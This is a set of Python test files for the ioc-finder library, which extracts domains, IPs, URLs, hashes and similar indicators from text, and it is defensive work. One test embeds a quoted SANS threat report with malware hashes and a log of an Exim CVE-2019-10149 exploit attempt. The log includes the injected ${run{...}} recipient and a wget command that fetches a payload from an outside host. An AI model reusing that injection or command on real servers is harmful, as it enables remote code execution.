 31 |     assert results["urls"] == ["https://o_o.lgms.nl/"]
 32 | 
 33 | 
 34 | def test_ioc_finder(text_a):
 35 |     iocs = find_iocs(text_a)
 36 |     assert len(iocs["domains"]) == 3
 37 |     assert "example.com" in iocs["domains"]
 38 |     assert "example.org" in iocs["domains"]
 39 |     assert "bad.com" in iocs["domains"]
 40 | 
 41 |     assert iocs["email_addresses_complete"] == ["bad12312@example.org"]
 42 | 
 43 |     assert len(iocs["ipv4s"]) == 2
 44 |     assert "1.2.3.4" in iocs["ipv4s"]
 45 |     assert "192.64.55.61" in iocs["ipv4s"]
 46 | 
 47 |     assert iocs["urls"] == ["http://bad.com/test/bingo.php"]
 48 |     assert iocs["md5s"] == ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]
 49 |     assert iocs["sha1s"] == ["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"]
 50 |     assert iocs["sha256s"] == ["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"]
 51 | 
 52 | 
 53 | def test_url_parsing():
 54 |     """Test some specific url examples."""
 55 |     s = "https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"
 56 |     iocs = find_iocs(s)
 57 |     assert iocs["urls"] == ["https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
 58 | 
 59 |     s = ''
 60 |     iocs = find_iocs(s)
 61 |     assert "http://fonts.googleapis.com/css?family=Lato:400,700" in iocs["urls"]
 62 | 
 63 |     s = ''
 64 |     iocs = find_iocs(s)
 65 |     assert "http://fonts.googleapis.com/css?family=Lato:400,700" in iocs["urls"]
 66 | 
 67 |     s = ''
 68 |     results = find_iocs(s)
 69 |     assert results["urls"] == ["https://bit.ly/12345#abcd"]
 70 | 
 71 |     s = ''
 72 |     results = find_iocs(s)
 73 |     assert results["urls"] == ["https://bit.ly/12345"]
 74 | 
 75 |     s = ''
 76 |     results = find_iocs(s)
 77 |     assert results["urls"] == ["https://bit.ly"]
 78 | 
 79 |     s = ''
 80 |     results = find_iocs(s)
 81 |     assert results["urls"] == ["https://bit.ly/"]
 82 | 
 83 |     s = "http://example.com//test"
 84 |     results = find_iocs(s)
 85 |     assert results["urls"] == ["http://example.com//test"]
 86 | 
 87 | 
 88 | def test_issue_45_url_parsing():
 89 |     s = "http://wmfolcs3.pn.4y.nv.kr2x1dt.net/gz+/(y%40%26//%3c7aew%5cqv%0a/%0bcz,r/r%5c%7b/7re//6%3e/f%23%7ce0p'6_%09/d%5c"
 90 |     results = find_iocs(s)
 91 |     assert results["urls"] == [
 92 |         "http://wmfolcs3.pn.4y.nv.kr2x1dt.net/gz+/(y%40%26//%3c7aew%5cqv%0a/%0bcz,r/r%5c%7b/7re//6%3e/f%23%7ce0p'6_%09/d%5c"
 93 |     ]
 94 | 
 95 | 
 96 | def test_schemeless_url_parsing():
 97 |     """Test parsing URLs without a scheme."""
 98 |     s = "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"
 99 |     iocs = find_iocs(s)
100 |     assert iocs["urls"] == ["github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
101 | 
102 |     s = "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh hightower.space/projects"
103 |     iocs = find_iocs(s)
104 |     assert len(iocs["urls"]) == 2
105 |     assert "hightower.space/projects" in iocs["urls"]
106 |     assert "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh" in iocs["urls"]
107 | 
108 |     s = "https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh hightower.space/projects"
109 |     iocs = find_iocs(s, parse_urls_without_scheme=False)
110 |     assert iocs["urls"] == ["https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
111 | 
112 | 
113 | def test_address_email_address():
114 |     s = ">test@[192.168.2.1]<"
115 |     iocs = find_iocs(s)
116 |     assert iocs["email_addresses_complete"] == ["test@[192.168.2.1]"]
117 |     assert iocs["email_addresses"] == ["test@[192.168.2.1]"]
118 |     assert iocs["ipv4s"] == ["192.168.2.1"]
119 | 
120 |     s = "bad@[192.168.7.3]"
121 |     iocs = find_iocs(s)
122 |     assert iocs["ipv4s"] == ["192.168.7.3"]
123 |     assert iocs["email_addresses_complete"] == ["bad@[192.168.7.3]"]
124 |     assert iocs["email_addresses"] == ["bad@[192.168.7.3]"]
125 | 
126 |     s = "bad@[192.168.7.3]aaaaa"
127 |     iocs = find_iocs(s)
128 |     assert iocs["email_addresses_complete"] == ["bad@[192.168.7.3]"]
129 |     assert iocs["email_addresses"] == ["bad@[192.168.7.3]"]
130 | 
131 |     s = "jsmith@[IPv6:2001:db8::1]"
132 |     iocs = find_iocs(s)
133 |     assert iocs["email_addresses_complete"] == ["jsmith@[IPv6:2001:db8::1]"]
134 |     assert iocs["email_addresses"] == ["jsmith@[IPv6:2001:db8::1]"]
135 |     assert iocs["ipv6s"] == ["2001:db8::1"]
136 | 
137 | 
138 | def test_address_domain_url():
139 |     s = "http://192.64.55.61/test.php"
140 |     iocs = find_iocs(s)
141 |     assert iocs["urls"] == ["http://192.64.55.61/test.php"]
142 |     assert iocs["ipv4s"] == ["192.64.55.61"]
143 | 
144 | 
145 | def test_url_domain_name_parsing():
146 |     s = "http://foo.youtube/test.php"
147 |     iocs = find_iocs(s)
148 |     assert iocs["urls"] == ["http://foo.youtube/test.php"]
149 |     assert iocs["domains"] == ["foo.youtube"]
150 | 
151 | 
152 | def test_ioc_deduplication():
153 |     """Make sure the results returned from the ioc_finder are deduplicated."""
154 |     iocs = find_iocs("example.com example.com")
155 |     assert iocs["domains"] == ["example.com"]
156 | 
157 | 
158 | def test_file_hash_order():
159 |     s = "{} {}".format("a" * 32, "b" * 40)
160 |     iocs = find_iocs(s)
161 |     assert iocs["md5s"][0] == "a" * 32
162 |     assert iocs["sha1s"][0] == "b" * 40
163 | 
164 | 
165 | def test_file_hash_parsing():
166 |     s = "this is a test{}".format("a" * 32)
167 |     iocs = find_iocs(s)
168 |     assert iocs["md5s"] == []
169 | 
170 |     s = "this is a test {}".format("a" * 32)
171 |     iocs = find_iocs(s)
172 |     assert iocs["md5s"] == ["a" * 32]
173 | 
174 |     s = 'this is a test "{}"'.format("a" * 32)
175 |     iocs = find_iocs(s)
176 |     assert iocs["md5s"] == ["a" * 32]
177 | 
178 |     s = "this is a test {}.".format("a" * 32)
179 |     iocs = find_iocs(s)
180 |     assert iocs["md5s"] == ["a" * 32]
181 | 
182 |     s = "0x1a1db93766e31994507511c9c70a1dd94465cf6d"
183 |     iocs = find_iocs(s)
184 |     assert iocs["sha1s"] == ["1a1db93766e31994507511c9c70a1dd94465cf6d"]
185 | 
186 | 
187 | def test_url_boundaries():
188 |     """Make sure the boundaries for a url are correct."""
189 |     s = """http://192.168.0.1/test/bad.html
""" 190 | iocs = find_iocs(s) 191 | assert iocs["urls"] == ["http://192.168.0.1/test/bad.html"] 192 | 193 | s = """
194 |
""" 195 | iocs = find_iocs(s) 196 | assert "https://i.imgur.com/abc.png#4827766048" in iocs["urls"] 197 | assert "https://i.imgur.com/def.png#4827766048" in iocs["urls"] 198 | assert len(iocs["urls"]) == 2 199 | 200 | s = """
""" 201 | iocs = find_iocs(s) 202 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 203 | 204 | s = """(https://i.imgur.com/abc.png)""" 205 | iocs = find_iocs(s) 206 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 207 | 208 | s = """(https://i.imgur.com/abc.png#abc)""" 209 | iocs = find_iocs(s) 210 | assert iocs["urls"] == ["https://i.imgur.com/abc.png#abc"] 211 | 212 | s = """[https://i.imgur.com/abc.png](https://i.imgur.com/abc.png)""" 213 | iocs = find_iocs(s) 214 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 215 | 216 | s = """[https://i.imgur.com/abc.png#abc](https://i.imgur.com/abc.png#abc)""" 217 | iocs = find_iocs(s) 218 | assert iocs["urls"] == ["https://i.imgur.com/abc.png#abc"] 219 | 220 | 221 | def test_domain_parsing(): 222 | s = "Host: dfasdfa (mz-fcb301p.ocn.ad.jp asdfsdafs" 223 | iocs = find_iocs(s) 224 | assert iocs["domains"] == ["mz-fcb301p.ocn.ad.jp"] 225 | 226 | s = "smtp.mailfrom" 227 | iocs = find_iocs(s) 228 | assert iocs["domains"] == [] 229 | 230 | s = "bar.com" 231 | iocs = find_iocs(s) 232 | assert iocs["domains"] == ["bar.com"] 233 | 234 | s = 'bar.com"' 235 | iocs = find_iocs(s) 236 | assert iocs["domains"] == ["bar.com"] 237 | 238 | s = "bar.com'" 239 | iocs = find_iocs(s) 240 | assert iocs["domains"] == ["bar.com"] 241 | 242 | s = "bar.com." 243 | iocs = find_iocs(s) 244 | assert iocs["domains"] == ["bar.com"] 245 | 246 | # make sure domains of different casings are properly parsed: https://github.com/fhightower/ioc-finder/issues/47 247 | iocs = find_iocs("BAR.com") 248 | assert iocs["domains"] == ["bar.com"] 249 | iocs = find_iocs("bar.COM") 250 | assert iocs["domains"] == ["bar.com"] 251 | iocs = find_iocs("BAR.COM") 252 | assert iocs["domains"] == ["bar.com"] 253 | 254 | 255 | def test_email_address_parsing(): 256 | s = 'my email is: foo"bar@gmail.com' 257 | iocs = find_iocs(s) 258 | assert iocs["email_addresses_complete"] == ['foo"bar@gmail.com'] 259 | assert iocs["email_addresses"] == ["bar@gmail.com"] 260 | 261 | s = "Abc\\@def@example.com" 262 | iocs = find_iocs(s) 263 | print(iocs["email_addresses_complete"]) 264 | print(iocs["email_addresses"]) 265 | assert iocs["email_addresses_complete"] == ["Abc\\@def@example.com"] 266 | assert iocs["email_addresses"] == ["def@example.com"] 267 | 268 | s = 'foobar@gmail.com"' 269 | iocs = find_iocs(s) 270 | assert iocs["email_addresses_complete"] == ["foobar@gmail.com"] 271 | assert iocs["email_addresses"] == ["foobar@gmail.com"] 272 | 273 | s = "foobar@gmail.comahhhhhhhh" 274 | iocs = find_iocs(s) 275 | assert iocs["email_addresses_complete"] == [] 276 | assert iocs["email_addresses"] == [] 277 | 278 | s = '"foobar@gmail.com' 279 | iocs = find_iocs(s) 280 | assert iocs["email_addresses_complete"] == ['"foobar@gmail.com'] 281 | assert iocs["email_addresses"] == ["foobar@gmail.com"] 282 | 283 | s = "smtp.mailfrom=example@example.com" 284 | iocs = find_iocs(s) 285 | assert iocs["email_addresses_complete"] == ["smtp.mailfrom=example@example.com"] 286 | assert iocs["email_addresses"] == ["example@example.com"] 287 | 288 | s = '"foo@bar.com"' 289 | iocs = find_iocs(s) 290 | assert iocs["email_addresses_complete"] == ['"foo@bar.com'] 291 | assert iocs["email_addresses"] == ["foo@bar.com"] 292 | 293 | # making sure that the `parse_domain_from_email_address` argument is working properly 294 | s = "foo@bar.com." 295 | iocs = find_iocs(s, parse_domain_from_email_address=False) 296 | assert iocs["email_addresses"] == ["foo@bar.com"] 297 | assert iocs["domains"] == [] 298 | 299 | s = '"foo@bar.com' 300 | iocs = find_iocs(s) 301 | assert iocs["email_addresses"] == ["foo@bar.com"] 302 | 303 | # validating https://github.com/fhightower/ioc-finder/issues/40 is fixed 304 | s = "-----foo@bar.com" 305 | iocs = find_iocs(s) 306 | assert iocs["email_addresses"] == ["foo@bar.com"] 307 | 308 | s = "foo-burt@bar.com f-1@bar.com" 309 | iocs = find_iocs(s) 310 | assert len(iocs["email_addresses"]) == 2 311 | assert "foo-burt@bar.com" in iocs["email_addresses"] 312 | assert "f-1@bar.com" in iocs["email_addresses"] 313 | 314 | 315 | def test_erroneous_ip_address_parsing(): 316 | # the two tests below make sure that IP addresses are not parsed from strings with decimals in them 317 | s = "2018.12.15.14.05.43" 318 | iocs = find_iocs(s) 319 | assert iocs["ipv4s"] == [] 320 | 321 | s = "111.12.15.14.05.43" 322 | iocs = find_iocs(s) 323 | assert iocs["ipv4s"] == [] 324 | 325 | s = ".18.12.15.14" 326 | iocs = find_iocs(s) 327 | assert iocs["ipv4s"] == [] 328 | 329 | s = "18.12.15.1411111111" 330 | iocs = find_iocs(s) 331 | assert iocs["ipv4s"] == [] 332 | 333 | s = "018.12.15.14" 334 | iocs = find_iocs(s) 335 | assert iocs["ipv4s"] == ["18.12.15.14"] 336 | 337 | s = "18.12.15.14." 338 | iocs = find_iocs(s) 339 | assert iocs["ipv4s"] == ["18.12.15.14"] 340 | 341 | # the three tests below make sure that IP addresses are not parsed from sequences with large numbers in them 342 | s = "1112.15.14.05" 343 | iocs = find_iocs(s) 344 | assert iocs["ipv4s"] == [] 345 | 346 | s = "15.1112.14.05" 347 | iocs = find_iocs(s) 348 | assert iocs["ipv4s"] == [] 349 | 350 | s = "15.14.05.1112" 351 | iocs = find_iocs(s) 352 | assert iocs["ipv4s"] == [] 353 | 354 | 355 | def test_ip_address_systematically(): 356 | # TODO: for many of the assertions below, I would like to be more explicit; I would like to change tests like `len(iocs['ipv4s']) == 1` to `iocs['ipv4s'] == ['1.1.1.1']` 357 | s = "1.1.1.1" 358 | iocs = find_iocs(s) 359 | assert iocs["ipv4s"] == ["1.1.1.1"] 360 | 361 | s = ".1.1.1.1" 362 | iocs = find_iocs(s) 363 | assert iocs["ipv4s"] == [] 364 | 365 | # I would like to match in this situation to capture ip address that are at the end of a sentence 366 | s = "1.1.1.1." 367 | iocs = find_iocs(s) 368 | assert iocs["ipv4s"] == ["1.1.1.1"] 369 | 370 | s = ".1.1.1.1." 371 | iocs = find_iocs(s) 372 | assert iocs["ipv4s"] == [] 373 | 374 | s = "1.1.1.1.1" 375 | iocs = find_iocs(s) 376 | assert iocs["ipv4s"] == [] 377 | 378 | s = ".1.1.1.1.1" 379 | iocs = find_iocs(s) 380 | assert iocs["ipv4s"] == [] 381 | 382 | s = "1.1.1.1.1." 383 | iocs = find_iocs(s) 384 | assert iocs["ipv4s"] == [] 385 | 386 | s = ".1.1.1.1.1." 387 | iocs = find_iocs(s) 388 | assert iocs["ipv4s"] == [] 389 | 390 | s = "1.1.1.1.1.1" 391 | iocs = find_iocs(s) 392 | assert iocs["ipv4s"] == [] 393 | 394 | s = "1.1.1.1.a" 395 | iocs = find_iocs(s) 396 | assert iocs["ipv4s"] == [] 397 | 398 | s = "1.01.1.1" 399 | iocs = find_iocs(s) 400 | assert iocs["ipv4s"] == ["1.1.1.1"] 401 | 402 | s = "01.1.1.1" 403 | iocs = find_iocs(s) 404 | assert iocs["ipv4s"] == ["1.1.1.1"] 405 | 406 | s = "01.01.1.1" 407 | iocs = find_iocs(s) 408 | assert iocs["ipv4s"] == ["1.1.1.1"] 409 | 410 | s = "0001.1.1.1" 411 | iocs = find_iocs(s) 412 | assert iocs["ipv4s"] == [] 413 | 414 | 415 | def test_onion_parsing(): 416 | s = "foo.onion" 417 | iocs = find_iocs(s) 418 | assert iocs["domains"] == ["foo.onion"] 419 | 420 | s = "http://foo.onion/test" 421 | iocs = find_iocs(s) 422 | assert iocs["urls"] == ["http://foo.onion/test"] 423 | assert iocs["domains"] == ["foo.onion"] 424 | 425 | 426 | def test_deduplication_of_indicators_with_different_cases(): 427 | s = "example.com Example.com exAmplE.com" 428 | iocs = find_iocs(s) 429 | assert iocs["domains"] == ["example.com"] 430 | 431 | s = "bad@example.com bad@Example.com bad@exAmplE.com" 432 | iocs = find_iocs(s) 433 | assert iocs["email_addresses"] == ["bad@example.com"] 434 | 435 | s = "bad@example.com Bad@example.com" 436 | iocs = find_iocs(s) 437 | assert iocs["email_addresses"] == ["bad@example.com"] 438 | 439 | s = "http://example.com/test http://EXAMple.com/test" 440 | iocs = find_iocs(s) 441 | assert iocs["urls"] == ["http://example.com/test"] 442 | 443 | s = "http://example.com/test http://EXAMple.com/TEST" 444 | iocs = find_iocs(s) 445 | assert len(iocs["urls"]) == 2 446 | assert "http://example.com/test" in iocs["urls"] 447 | assert "http://example.com/TEST" in iocs["urls"] 448 | 449 | 450 | def test_google_adsense_publisher_ids(): 451 | s = "PUB-1234567891234567" 452 | iocs = find_iocs(s) 453 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 454 | 455 | s = "pUb-1234567891234567" 456 | iocs = find_iocs(s) 457 | assert iocs["google_adsense_publisher_ids"] == [] 458 | 459 | s = "PUB-1234567891234567" 460 | iocs = find_iocs(s) 461 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 462 | 463 | 464 | def test_google_analyitics_tracker_ids(): 465 | s = "ua-000000-1" 466 | iocs = find_iocs(s) 467 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 468 | 469 | s = "uA-000000-1" 470 | iocs = find_iocs(s) 471 | assert iocs["google_analytics_tracker_ids"] == [] 472 | 473 | s = "UA-000000-1" 474 | iocs = find_iocs(s) 475 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 476 | 477 | 478 | def test_google_casing_deduplication(): 479 | s = "pub-1234567891234567 PUB-1234567891234567 pUb-1234567891234567" 480 | iocs = find_iocs(s) 481 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 482 | 483 | s = "UA-000000-1 ua-000000-1" 484 | iocs = find_iocs(s) 485 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 486 | 487 | 488 | def test_not_parsing_imphash(): 489 | s = "imphash 18ddf28a71089acdbab5038f58044c0a" 490 | iocs = find_iocs(s, parse_imphashes=False) 491 | assert "imphashes" not in iocs 492 | # even if we aren't parsing imphashes, they will still be removed and, thus, not parsed as md5s 493 | assert iocs["md5s"] == [] 494 | 495 | 496 | def test_not_parsing_authentihash(): 497 | s = "authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4" 498 | iocs = find_iocs(s, parse_authentihashes=False) 499 | assert "authentihashes" not in iocs 500 | # even if we aren't parsing authentihashes, they will still be removed and, thus, not parsed as sha256s 501 | assert iocs["sha256s"] == [] 502 | 503 | 504 | def test_mac_address_parsing(): 505 | s = "2019.02.15" 506 | iocs = find_iocs(s) 507 | assert iocs["mac_addresses"] == [] 508 | 509 | 510 | def test_unix_file_paths__not_detect_url(): 511 | # https://github.com/fhightower/ioc-finder/issues/42 512 | s = "https://twitter.com/" 513 | iocs = find_iocs(s) 514 | assert iocs["file_paths"] == [] 515 | 516 | 517 | def test_ipv6_parsing(): 518 | # https://github.com/fhightower/ioc-finder/issues/37 519 | s = "11:04:10 -0500" 520 | iocs = find_iocs(s) 521 | assert iocs["ipv6s"] == [] 522 | 523 | 524 | def test_ssdeep_parsing(): 525 | # https://github.com/fhightower/ioc-finder/issues/36 526 | s = "11:04:10 -0500" 527 | iocs = find_iocs(s) 528 | assert iocs["ssdeeps"] == [] 529 | 530 | 531 | def test_certificate_serial_number_issue_96(): 532 | # see https://github.com/fhightower/ioc-finder/issues/96 533 | s = """SolarWinds.Orion.Core.BusinessLayer.dll is signed by SolarWinds, using the certificate with serial number 0f:e9:73:75:20:22:a6:06:ad:f2:a3:6e:34:5d:c0:ed. The file was signed on March 24, 2020.""" 534 | observables = find_iocs(s) 535 | print(observables) 536 | assert observables["ipv6s"] == [] 537 | assert observables["mac_addresses"] == [] 538 | -------------------------------------------------------------------------------- /tests/test_execution_time.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from ioc_finder import ioc_finder 4 | 5 | 6 | def parse(): 7 | s = """209.217.225.74 port 80 - hotelesmeflo.com - GET /chachapoyas/wp-content/themes/sketch/msr.exe 8 | SHA256 hash: a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc (https://www.virustotal.com/gui/file/a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc/detection) 9 | 10 | File size: 9,261 bytes 11 | File description: Flash exploit used by Rig EK on 2019-06-17 12 | SHA256 hash: 2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5 (https://www.virustotal.com/gui/file/2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5/detection) 13 | 14 | File size: 354,304 bytes 15 | File description: Payload sent by Rig EK on 2019-06-17 (AZORult) 16 | SHA256 hash: a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8 (https://www.virustotal.com/gui/file/a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8/community) 17 | 18 | File size: 2,952,704 bytes 19 | File description: Follow-up malware hosted on URL at hotelesmeflo.com on 2019-06-17 20 | Final words 21 | 22 | My infected Windows host 23 | Published : 2019-06-19 24 | Last Updated : 2019-06-19 14:34:52 UTC 25 | by Johannes Ullrich (https://plus.google.com/101587262224166552564?rel=author) (Version: 1) 26 | 27 | Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (https://isc.sans.edu/vuln.html?cve=2019-10149) (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well. 28 | 29 | A couple of logs from our own mail server (running postfix): 30 | 31 | > Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command)) 32 | 33 | The exploit is attempting to run the following command: 34 | 35 | > /bin/sht-ct "wget 64.50.180.45/tmp/70.91.145.10" 36 | 37 | Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel. 38 | 39 | The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..). 40 | 41 | --- 42 | Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute (https://sans.edu) 43 | Twitter (https://jbu.me/164) 44 | """ 45 | ioc_finder.find_iocs(s) 46 | 47 | 48 | # def test_execution_times(): 49 | # """Test how long it takes for the ioc finder package to run.""" 50 | # times = [] 51 | # n = 50 52 | 53 | # for i in range(0, n): 54 | # start_time = time.time() 55 | # parse() 56 | # end_time = time.time() 57 | # times.append(end_time - start_time) 58 | 59 | # print(times) 60 | # print('Average time: {}'.format(sum(times) / n)) 61 | # # fail the tests so that the times are printed 62 | # assert 1 == 2 63 | -------------------------------------------------------------------------------- /tests/test_find_iocs.py: -------------------------------------------------------------------------------- 1 | from typing import Dict 2 | 3 | import pytest 4 | 5 | from ioc_finder import find_iocs 6 | from ioc_finder.ioc_finder import IndicatorDict, IndicatorList 7 | 8 | from .find_iocs_cases import ALL_TESTS 9 | 10 | 11 | @pytest.mark.parametrize("text, results, args", ALL_TESTS) 12 | def test_find_iocs(text: str, results: Dict, args: Dict) -> None: 13 | # Parse input 14 | iocs = find_iocs(text, **args) 15 | 16 | for key, value in iocs.items(): 17 | # Compare lists 18 | if isinstance(value, list): 19 | _compare_lists(key, value, results.get(key, [])) 20 | # Compare sub dictionaries like for attack patterns 21 | elif isinstance(value, dict): 22 | _compare_dicts(key, value, results.get(key, {})) 23 | 24 | 25 | def _compare_lists(key_name: str, ioc_list: IndicatorList, result_list: IndicatorList) -> None: 26 | assert sorted(ioc_list) == sorted( 27 | result_list 28 | ), f"Unexpected result for key '[{key_name}]' -> Expected: '{result_list}' Received: '{ioc_list}'" 29 | 30 | 31 | def _compare_dicts(key_name: str, ioc_dict: IndicatorDict, result_dict: IndicatorDict) -> None: 32 | for ioc_key, ioc_value in ioc_dict.items(): 33 | if isinstance(ioc_value, list): 34 | _compare_lists(f"{key_name},{ioc_key}", ioc_value, result_dict.get(ioc_key, [])) 35 | -------------------------------------------------------------------------------- /tests/test_ioc_finder.py: -------------------------------------------------------------------------------- 1 | from ioc_finder import find_iocs 2 | 3 | 4 | def test_tlp_labels(): 5 | s = "tlp amber and TLP:RED" 6 | iocs = find_iocs(s) 7 | assert len(iocs["tlp_labels"]) == 2 8 | assert "TLP:RED" in iocs["tlp_labels"] 9 | assert "TLP:AMBER" in iocs["tlp_labels"] 10 | 11 | s = "tlp-Amber and TLPRED TlpGreen" 12 | iocs = find_iocs(s) 13 | assert len(iocs["tlp_labels"]) == 3 14 | assert "TLP:RED" in iocs["tlp_labels"] 15 | assert "TLP:AMBER" in iocs["tlp_labels"] 16 | assert "TLP:GREEN" in iocs["tlp_labels"] 17 | 18 | 19 | def test_domain_parsing(): 20 | s = "this is just a (google.com) test of example.com" 21 | iocs = find_iocs(s) 22 | assert len(iocs["domains"]) == 2 23 | assert "google.com" in iocs["domains"] 24 | 25 | 26 | def test_ipv4_parsing(): 27 | s = "this is just a (1.2.3.54) test of 255.255.1.255 255.256.344.1" 28 | iocs = find_iocs(s) 29 | assert len(iocs["ipv4s"]) == 2 30 | assert "1.2.3.54" in iocs["ipv4s"] 31 | assert "255.255.1.255" in iocs["ipv4s"] 32 | assert "255.256.344.1" not in iocs["ipv4s"] 33 | 34 | 35 | def test_ipv6_parsing(): 36 | s = "2001:0db8:0000:0000:0000:ff00:0042:8329 testing 2001:db8:0:0:0:ff00:42:8329 shfaldkafsdfa 2001:db8::ff00:42:8329 asdfadfas afkj;fl ::1 kljfkadf 1:1" 37 | iocs = find_iocs(s) 38 | assert len(iocs["ipv6s"]) == 4 39 | # TODO: the following 3 ipv6s addresses are the same representation of the same thing; I need to deduplicate these more thoroughly in the parsing function 40 | assert "2001:0db8:0000:0000:0000:ff00:0042:8329" in iocs["ipv6s"] 41 | assert "2001:db8:0:0:0:ff00:42:8329" in iocs["ipv6s"] 42 | assert "2001:db8::ff00:42:8329" in iocs["ipv6s"] 43 | assert "::1" in iocs["ipv6s"] 44 | assert "1:1" not in iocs["ipv6s"] 45 | 46 | 47 | def test_email_address_parsing(): 48 | s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]" 49 | 50 | iocs = find_iocs(s)["email_addresses_complete"] 51 | print(iocs) 52 | assert len(iocs) == 10 53 | assert "test@a.com" in iocs 54 | assert "bingo@en.wikipedia.com" in iocs 55 | assert "foo@a.com" in iocs 56 | assert "bar@b.a.com" in iocs 57 | assert "bad@test-ing.com" in iocs 58 | assert "me@2600.com" in iocs 59 | assert "john.smith(comment)@example.com" in iocs 60 | assert "(comment)john.smith@example.com" in iocs 61 | assert '"John..Doe"@example.com' in iocs 62 | assert "test@[192.168.0.1]" in iocs 63 | 64 | iocs = find_iocs("a@example.com") 65 | assert iocs["email_addresses_complete"][0] == "a@example.com" 66 | 67 | 68 | def test_complex_email_address_parsing(): 69 | s = "john.smith(comment)@example.com" 70 | iocs = find_iocs(s) 71 | assert "john.smith(comment)@example.com" in iocs["email_addresses_complete"] 72 | 73 | 74 | def test_simple_email_address_parsing(): 75 | s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]" 76 | 77 | iocs = find_iocs(s) 78 | assert len(iocs["email_addresses"]) == 8 79 | assert "test@a.com" in iocs["email_addresses"] 80 | assert "bingo@en.wikipedia.com" in iocs["email_addresses"] 81 | assert "foo@a.com" in iocs["email_addresses"] 82 | assert "bar@b.a.com" in iocs["email_addresses"] 83 | assert "bad@test-ing.com" in iocs["email_addresses"] 84 | assert "me@2600.com" in iocs["email_addresses"] 85 | assert "john.smith@example.com" in iocs["email_addresses"] 86 | assert "test@[192.168.0.1]" in iocs["email_addresses"] 87 | 88 | iocs = find_iocs("a@example.com") 89 | assert iocs["email_addresses"][0] == "a@example.com" 90 | 91 | 92 | def test_url_parsing(): 93 | invalid_urls = [ 94 | "foo@{}.com".format("a" * 64), 95 | "!@.com", 96 | "foo@abc", 97 | "@@@@-hi-.com", 98 | "@_hi_.com", 99 | "me@*hi*.com", 100 | "foo{}.com".format("a" * 64), 101 | ".com", 102 | "abc", 103 | "-hi-.com", 104 | "_hi_.com", 105 | "*hi*.com", 106 | ] 107 | 108 | valid_urls = [ 109 | "https://a.com", 110 | "https://en.wikipedia.com", 111 | "https://{}.com".format("a" * 63), 112 | "https://{}.{}.com".format("a" * 63, "a" * 63), 113 | "https://test-ing.com", 114 | "https://2600.com", 115 | "https://example.com", 116 | "http://example.com", 117 | "ftp://example.com", 118 | ] 119 | 120 | iocs = find_iocs(" ".join(valid_urls)) 121 | assert len(iocs["urls"]) == 9 122 | # make sure domains are being parsed from the valid urls as well 123 | assert len(iocs["domains"]) == 7 124 | 125 | iocs = find_iocs(" ".join(invalid_urls)) 126 | assert len(iocs["urls"]) == 0 127 | 128 | s = "http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138" 129 | iocs = find_iocs(s) 130 | print(iocs["urls"]) 131 | assert iocs["urls"] == [ 132 | "http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138" 133 | ] 134 | 135 | s = 